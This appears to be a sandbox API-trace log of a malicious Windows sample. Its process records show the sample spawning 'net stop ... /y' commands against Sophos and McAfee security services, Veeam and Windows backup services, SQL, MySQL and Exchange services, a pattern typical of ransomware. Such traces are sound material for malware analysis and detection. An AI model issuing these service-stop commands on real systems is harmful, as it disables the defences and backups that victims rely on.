[0110.086] _wcsupr (in: _String="QBIDPService" | out: _String="QBIDPSERVICE") returned="QBIDPSERVICE" [0110.086] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8054b0 [0110.112] GetServiceKeyNameW (in: hSCManager=0x8054b0, lpDisplayName="QBIDPSERVICE", lpServiceName=0x3faaf0, lpcchBuffer=0x30f778 | out: lpServiceName="", lpcchBuffer=0x30f778) returned 0 [0110.112] _wcsicmp (_String1="msg", _String2="QBIDPSERVICE") returned -4 [0110.112] _wcsicmp (_String1="messenger", _String2="QBIDPSERVICE") returned -4 [0110.112] _wcsicmp (_String1="receiver", _String2="QBIDPSERVICE") returned 1 [0110.112] _wcsicmp (_String1="rcv", _String2="QBIDPSERVICE") returned 1 [0110.112] _wcsicmp (_String1="redirector", _String2="QBIDPSERVICE") returned 1 [0110.112] _wcsicmp (_String1="redir", _String2="QBIDPSERVICE") returned 1 [0110.112] _wcsicmp (_String1="rdr", _String2="QBIDPSERVICE") returned 1 [0110.112] _wcsicmp (_String1="workstation", _String2="QBIDPSERVICE") returned 6 [0110.112] _wcsicmp (_String1="work", _String2="QBIDPSERVICE") returned 6 [0110.112] _wcsicmp (_String1="wksta", _String2="QBIDPSERVICE") returned 6 [0110.113] _wcsicmp (_String1="prdr", _String2="QBIDPSERVICE") returned -1 [0110.113] _wcsicmp (_String1="devrdr", _String2="QBIDPSERVICE") returned -13 [0110.113] _wcsicmp (_String1="lanmanworkstation", _String2="QBIDPSERVICE") returned -5 [0110.113] _wcsicmp (_String1="server", _String2="QBIDPSERVICE") returned 2 [0110.113] _wcsicmp (_String1="svr", _String2="QBIDPSERVICE") returned 2 [0110.113] _wcsicmp (_String1="srv", _String2="QBIDPSERVICE") returned 2 [0110.113] _wcsicmp (_String1="lanmanserver", _String2="QBIDPSERVICE") returned -5 [0110.113] _wcsicmp (_String1="alerter", _String2="QBIDPSERVICE") returned -16 [0110.113] _wcsicmp (_String1="netlogon", _String2="QBIDPSERVICE") returned -3 [0110.113] NetServiceControl (in: servername=0x0, service="QBIDPSERVICE", opcode=0x0, arg=0x0, bufptr=0x30f774 | out: bufptr=0x30f774) returned 0x889 [0110.114] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0110.114] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0110.114] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0110.115] GetFileType (hFile=0x0) returned 0x0 [0110.115] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x803ed0 [0110.115] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x803ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0110.115] WriteFile (in: hFile=0x0, lpBuffer=0x803ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30f6b4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f6b4, lpOverlapped=0x0) returned 0 [0110.115] LocalFree (hMem=0x803ed0) returned 0x0 [0110.115] GetFileType (hFile=0x0) returned 0x0 [0110.115] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x806178 [0110.115] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x806178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x80", lpUsedDefaultChar=0x0) returned 2 [0110.115] WriteFile (in: hFile=0x0, lpBuffer=0x806178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f6b4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f6b4, lpOverlapped=0x0) returned 0 [0110.115] LocalFree (hMem=0x806178) returned 0x0 [0110.115] _ultow (in: _Dest=0x889, _Radix=3208932 | out: _Dest=0x889) returned="2185" [0110.115] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0110.115] GetFileType (hFile=0x0) returned 0x0 [0110.115] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x806178 [0110.116] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x806178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0110.116] WriteFile (in: hFile=0x0, lpBuffer=0x806178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30f6c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f6c0, lpOverlapped=0x0) returned 0 [0110.116] LocalFree (hMem=0x806178) returned 0x0 [0110.116] GetFileType (hFile=0x0) returned 0x0 [0110.116] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x806178 [0110.116] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x806178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x80", lpUsedDefaultChar=0x0) returned 2 [0110.116] WriteFile (in: hFile=0x0, lpBuffer=0x806178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f6c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f6c0, lpOverlapped=0x0) returned 0 [0110.116] LocalFree (hMem=0x806178) returned 0x0 [0110.116] NetApiBufferFree (Buffer=0x801ae8) returned 0x0 [0110.116] NetApiBufferFree (Buffer=0x801b00) returned 0x0 [0110.116] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop QBIDPService /y" [0110.116] exit (_Code=2) Process: id = "164" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2232a000" os_pid = "0x1128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop mfefire /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 541 os_tid = 0x112c Process: id = "165" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2064c000" os_pid = "0x1148" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSExchangeSA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 548 os_tid = 0x114c Process: id = "166" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1b961000" os_pid = "0x1160" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamNFSSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 550 os_tid = 0x1164 Process: id = "167" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2169c000" os_pid = "0x1170" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop sophos /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 551 os_tid = 0x1174 Process: id = "168" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x233b6000" os_pid = "0x1180" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLFDLauncher$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 552 os_tid = 0x1184 Process: id = "169" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x21031000" os_pid = "0x119c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSExchangeMGMT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 555 os_tid = 0x11a0 Process: id = "170" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1f646000" os_pid = "0x11c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 556 os_tid = 0x11c8 Process: id = "171" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1f94b000" os_pid = "0x11cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos File Scanner Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 557 os_tid = 0x11d0 Process: id = "172" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20550000" os_pid = "0x11d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MySQL57 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 559 os_tid = 0x11dc Process: id = "173" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2032a000" os_pid = "0x11e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "76" os_parent_pid = "0xe6c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 560 os_tid = 0x11e4 [0114.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ff7a4 | out: lpSystemTimeAsFileTime=0x2ff7a4*(dwLowDateTime=0x18051650, dwHighDateTime=0x1d6f0d1)) [0114.529] GetCurrentProcessId () returned 0x11e0 [0114.529] GetCurrentThreadId () returned 0x11e4 [0114.529] GetTickCount () returned 0x114ff27 [0114.529] QueryPerformanceCounter (in: lpPerformanceCount=0x2ff79c | out: lpPerformanceCount=0x2ff79c*=23362996158) returned 1 [0114.529] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0114.529] __set_app_type (_Type=0x1) [0114.529] __p__fmode () returned 0x770331f4 [0114.530] __p__commode () returned 0x770331fc [0114.530] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0114.530] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0114.530] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.530] GetConsoleOutputCP () returned 0x1b5 [0114.530] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0114.530] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.533] sprintf_s (in: _DstBuf=0x2ff75c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0114.534] setlocale (category=0, locale=".437") returned="English_United States.437" [0114.536] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0114.536] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.536] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0114.536] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ff528, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0114.536] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x7c) returned 0x703af8 [0114.536] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0114.536] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff72c | out: Buffer=0x2ff72c*=0x701b00) returned 0x0 [0114.536] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff72c | out: Buffer=0x2ff72c*=0x701b18) returned 0x0 [0114.536] _fileno (_File=0x77032900) returned -2 [0114.536] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0114.536] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0114.536] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0114.536] _wcsicmp (_String1="config", _String2="stop") returned -16 [0114.536] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0114.536] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0114.536] _wcsicmp (_String1="file", _String2="stop") returned -13 [0114.536] _wcsicmp (_String1="files", _String2="stop") returned -13 [0114.537] _wcsicmp (_String1="group", _String2="stop") returned -12 [0114.537] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0114.537] _wcsicmp (_String1="help", _String2="stop") returned -11 [0114.537] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0114.537] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0114.537] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0114.537] _wcsicmp (_String1="session", _String2="stop") returned -15 [0114.537] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0114.537] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0114.537] _wcsicmp (_String1="share", _String2="stop") returned -12 [0114.537] _wcsicmp (_String1="start", _String2="stop") returned -14 [0114.537] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0114.537] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0114.537] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0114.537] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0114.537] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0114.537] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0114.537] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0114.537] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0114.537] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0114.537] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0114.537] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0114.537] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0114.538] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0114.538] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0114.538] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0114.538] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0114.538] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.538] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.538] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.538] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.538] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.538] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.538] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.538] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.538] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2008R2") returned 7 [0114.538] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0114.538] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0114.538] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0114.538] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0114.538] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.538] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.538] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0114.538] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.538] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.538] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.538] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0114.538] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0114.538] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0114.538] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0114.538] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0114.539] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0114.539] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.539] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.539] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.539] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0114.539] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0114.539] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0114.539] _wcsupr (in: _String="MSSQL$VEEAMSQL2008R2" | out: _String="MSSQL$VEEAMSQL2008R2") returned="MSSQL$VEEAMSQL2008R2" [0114.539] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7054d8 [0114.649] GetServiceKeyNameW (in: hSCManager=0x7054d8, lpDisplayName="MSSQL$VEEAMSQL2008R2", lpServiceName=0x39aaf0, lpcchBuffer=0x2ff6c8 | out: lpServiceName="", lpcchBuffer=0x2ff6c8) returned 0 [0114.649] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0114.649] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0114.649] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.650] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.650] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.650] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.650] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0114.650] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0114.650] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0114.650] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0114.650] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0114.650] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0114.650] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0114.650] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.650] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.650] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0114.650] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0114.650] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0114.650] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0114.650] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x2ff6c4 | out: bufptr=0x2ff6c4) returned 0x889 [0114.651] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0114.651] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0114.652] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0114.653] GetFileType (hFile=0x0) returned 0x0 [0114.653] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x703ef8 [0114.653] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x703ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\no", lpUsedDefaultChar=0x0) returned 30 [0114.653] WriteFile (in: hFile=0x0, lpBuffer=0x703ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ff604, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff604, lpOverlapped=0x0) returned 0 [0114.653] LocalFree (hMem=0x703ef8) returned 0x0 [0114.653] GetFileType (hFile=0x0) returned 0x0 [0114.653] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7061a0 [0114.653] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7061a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0114.653] WriteFile (in: hFile=0x0, lpBuffer=0x7061a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff604, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff604, lpOverlapped=0x0) returned 0 [0114.653] LocalFree (hMem=0x7061a0) returned 0x0 [0114.653] _ultow (in: _Dest=0x889, _Radix=3143220 | out: _Dest=0x889) returned="2185" [0114.653] FormatMessageW (in: dwFlags=0x2800, 